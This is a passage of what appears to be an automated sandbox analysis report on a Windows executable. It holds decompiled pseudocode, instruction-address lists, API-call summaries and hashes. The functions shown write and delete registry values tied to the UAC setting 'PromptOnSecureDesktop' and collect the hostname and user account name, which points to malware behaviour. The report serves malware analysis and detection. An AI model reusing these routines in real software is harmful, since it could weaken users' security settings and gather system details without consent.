							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 =  *0x4121a8; // 0x0
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C(0x4121a8,  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}























                                                                                0x004080c9
                                                                                0x004080d7
                                                                                0x004080da
                                                                                0x004080e0
                                                                                0x004080ed
                                                                                0x0040810b
                                                                                0x00408110
                                                                                0x00408115
                                                                                0x00000000
                                                                                0x00408130
                                                                                0x00408151
                                                                                0x00408156
                                                                                0x00408167
                                                                                0x00408216
                                                                                0x0040821d
                                                                                0x00408222
                                                                                0x00000000
                                                                                0x00408222
                                                                                0x0040818b
                                                                                0x004081f7
                                                                                0x004081f7
                                                                                0x004081fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408201
                                                                                0x00408206
                                                                                0x00000000
                                                                                0x00408198
                                                                                0x0040819b
                                                                                0x004081a0
                                                                                0x004081a1
                                                                                0x004081a8
                                                                                0x0040820d
                                                                                0x00408210
                                                                                0x00000000
                                                                                0x00408210
                                                                                0x004081aa
                                                                                0x004081c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004081c4
                                                                                0x004081ca
                                                                                0x004081cd
                                                                                0x004081cd
                                                                                0x004081cf
                                                                                0x004081d0
                                                                                0x004081d8
                                                                                0x004081dd
                                                                                0x004081de
                                                                                0x004081e5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004081ef
                                                                                0x0040820c
                                                                                0x0040820c
                                                                                0x00000000
                                                                                0x0040820c
                                                                                0x0040818b
                                                                                0x004080ef
                                                                                0x004080ef
                                                                                0x00408225
                                                                                0x00408225
                                                                                0x0040822b
                                                                                0x0040822d
                                                                                0x00408233
                                                                                0x0040823f
                                                                                0x00408244
                                                                                0x0040824b
                                                                                0x0040824d
                                                                                0x00408259
                                                                                0x0040825e
                                                                                0x00408264
                                                                                0x00408269
                                                                                0x0040824b
                                                                                0x00408233
                                                                                0x00408273
                                                                                0x00408273

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 0040815F
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408187
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 004081BE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408210
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                  • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 124786226-2980165447
                                                                                • Opcode ID: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
                                                                                • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                • Opcode Fuzzy Hash: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
                                                                                • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E095 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}
















                                                                                0x0040e09c
                                                                                0x0040e0ba
                                                                                0x00000000
                                                                                0x0040e172
                                                                                0x0040e0c3
                                                                                0x0040e0c6
                                                                                0x0040e0c9
                                                                                0x0040e0cc
                                                                                0x0040e0cc
                                                                                0x0040e0ce
                                                                                0x0040e0cf
                                                                                0x0040e0d7
                                                                                0x0040e0d9
                                                                                0x0040e0df
                                                                                0x0040e0e3
                                                                                0x0040e0e3
                                                                                0x0040e0ec
                                                                                0x0040e0f1
                                                                                0x0040e0f4
                                                                                0x0040e0f9
                                                                                0x0040e13f
                                                                                0x0040e149
                                                                                0x0040e158
                                                                                0x0040e161
                                                                                0x00000000
                                                                                0x0040e0fb
                                                                                0x0040e0fb
                                                                                0x0040e0fb
                                                                                0x0040e102
                                                                                0x0040e104
                                                                                0x0040e104
                                                                                0x0040e110
                                                                                0x0040e115
                                                                                0x0040e12f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e131
                                                                                0x0040e134
                                                                                0x0040e136
                                                                                0x0040e13b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e13b
                                                                                0x0040e13d
                                                                                0x00000000
                                                                                0x0040e13d

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2667537340-2980165447
                                                                                • Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                • Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208E2FC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0208E50A,00000000,00000000,00000000,00020106,00000000,0208E50A,00000000,000000E4), ref: 0208E319
                                                                                • RegSetValueExA.ADVAPI32(0208E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E38E
                                                                                • RegDeleteValueA.ADVAPI32(0208E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E3BF
                                                                                • RegCloseKey.ADVAPI32(0208E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0208E50A), ref: 0208E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2667537340-2980165447
                                                                                • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction ID: 5e56b570d59e4ce8178cce3ddfda0903a2687287925dbed8b3ce94cbf59010e2
                                                                                • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction Fuzzy Hash: 09212D71A00219BBDB21AFA5EC89EDF7FA9EF08750F048061F944A6150E7718A54EB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020871C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 020871E1
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02087228
                                                                                • LocalFree.KERNEL32(?,?,?), ref: 02087286
                                                                                • wsprintfA.USER32 ref: 0208729D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                • String ID: |
                                                                                • API String ID: 2539190677-2343686810
                                                                                • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction ID: a63f57db9597029000ff4f8d0fe4bc5d960c7dc636aaefd909503b73018d6aee
                                                                                • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction Fuzzy Hash: 2A313A76900209BFDB41EFA8DC49BDB7BACEF04314F148066F859DB214EB75D6488B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD08 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55stringnetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}









                                                                                0x0040ad1c
                                                                                0x0040ad24
                                                                                0x0040ad71
                                                                                0x0040ad74
                                                                                0x0040ad77
                                                                                0x0040ad88
                                                                                0x0040ad88
                                                                                0x00000000
                                                                                0x0040ad7f
                                                                                0x0040ad26
                                                                                0x0040ad29
                                                                                0x0040ad2c
                                                                                0x0040ad2f
                                                                                0x0040ad55
                                                                                0x0040ad35
                                                                                0x0040ad3d
                                                                                0x0040ad45
                                                                                0x0040ad4d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ad4d
                                                                                0x0040ad45
                                                                                0x00000000
                                                                                0x0040ad4f
                                                                                0x0040ad4f
                                                                                0x0040ad4f
                                                                                0x0040ad51
                                                                                0x0040ad52
                                                                                0x0040ad52
                                                                                0x0040ad53
                                                                                0x00000000
                                                                                0x0040ad53
                                                                                0x0040ad35
                                                                                0x0040ad60
                                                                                0x0040ad66
                                                                                0x0040ad69
                                                                                0x0040ad6b
                                                                                0x0040ad6b
                                                                                0x00000000

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$gethostnamelstrcpy
                                                                                • String ID: LocalHost
                                                                                • API String ID: 3695455745-3154191806
                                                                                • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208B478 Relevance: 7.6, APIs: 5, Instructions: 131timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0208B51A
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0208B529
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0208B548
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0208B590
                                                                                • wsprintfA.USER32 ref: 0208B61E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                • String ID:
                                                                                • API String ID: 4026320513-0
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 89561329c8317dd72b2e9856f366803a62c44ebd6037ee89c6b7e63d2cf666ba
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: 38512EB1D0021DAACF54DFD5D8885EEBBF9BF48304F10812AF501A6150E7B84AC9DF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020862D0 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02086303
                                                                                • LoadLibraryA.KERNEL32(?), ref: 0208632A
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 020863B1
                                                                                • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 02086405
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HugeRead$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 3498078134-0
                                                                                • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction ID: e9a8919af375cf8ded5a946453885d255e92373b06e9554dc47347bc373ff34a
                                                                                • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction Fuzzy Hash: 8B417C71A00305AFDB55EF58C884BAEB7F8FF05318F168069E995D7290D772E980EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402923 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}




























                                                                                0x00402923
                                                                                0x00402931
                                                                                0x00402932
                                                                                0x00402935
                                                                                0x0040293b
                                                                                0x00402950
                                                                                0x00402957
                                                                                0x0040296a
                                                                                0x0040296e
                                                                                0x00402970
                                                                                0x00402973
                                                                                0x00402978
                                                                                0x00402a5b
                                                                                0x00402a5b
                                                                                0x00402a5e
                                                                                0x00000000
                                                                                0x00402a5e
                                                                                0x0040297e
                                                                                0x00402995
                                                                                0x004029ac
                                                                                0x004029ae
                                                                                0x004029b1
                                                                                0x004029b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004029c1
                                                                                0x004029ca
                                                                                0x004029d6
                                                                                0x004029e0
                                                                                0x004029e2
                                                                                0x004029e6
                                                                                0x004029ee
                                                                                0x004029f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a0a
                                                                                0x00402a0e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a18
                                                                                0x00402a2a
                                                                                0x00402a33
                                                                                0x00402a36
                                                                                0x00402a38
                                                                                0x00402a3b
                                                                                0x00402a3e
                                                                                0x00402a43
                                                                                0x00402a4a
                                                                                0x00402a45
                                                                                0x00402a45
                                                                                0x00402a45
                                                                                0x00402a4c
                                                                                0x00402a55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a55
                                                                                0x00000000
                                                                                0x0040297e
                                                                                0x00402959
                                                                                0x00000000
                                                                                0x00402959
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E654 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x74cb43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}















                                                                                0x0040e65a
                                                                                0x0040e664
                                                                                0x0040e666
                                                                                0x0040e66c
                                                                                0x0040e6a9
                                                                                0x0040e6b0
                                                                                0x0040e6b5
                                                                                0x0040e6c8
                                                                                0x0040e6d0
                                                                                0x0040e6d3
                                                                                0x0040e6d8
                                                                                0x0040e6de
                                                                                0x0040e6f5
                                                                                0x0040e6e0
                                                                                0x0040e6e5
                                                                                0x0040e6e9
                                                                                0x0040e6ef
                                                                                0x0040e6ef
                                                                                0x0040e6f9
                                                                                0x0040e6f9
                                                                                0x0040e6fe
                                                                                0x0040e704
                                                                                0x0040e741
                                                                                0x0040e743
                                                                                0x0040e6b9
                                                                                0x0040e6b9
                                                                                0x0040e6c4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e706
                                                                                0x0040e706
                                                                                0x0040e706
                                                                                0x0040e709
                                                                                0x0040e70b
                                                                                0x0040e70e
                                                                                0x0040e715
                                                                                0x0040e715
                                                                                0x0040e715
                                                                                0x0040e718
                                                                                0x0040e71b
                                                                                0x0040e72c
                                                                                0x0040e72c
                                                                                0x0040e72c
                                                                                0x0040e732
                                                                                0x00000000
                                                                                0x0040e736
                                                                                0x0040e722
                                                                                0x0040e728
                                                                                0x0040e72a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e72a
                                                                                0x0040e710
                                                                                0x0040e713
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e737
                                                                                0x0040e737
                                                                                0x0040e739
                                                                                0x0040e739
                                                                                0x00000000
                                                                                0x0040e706
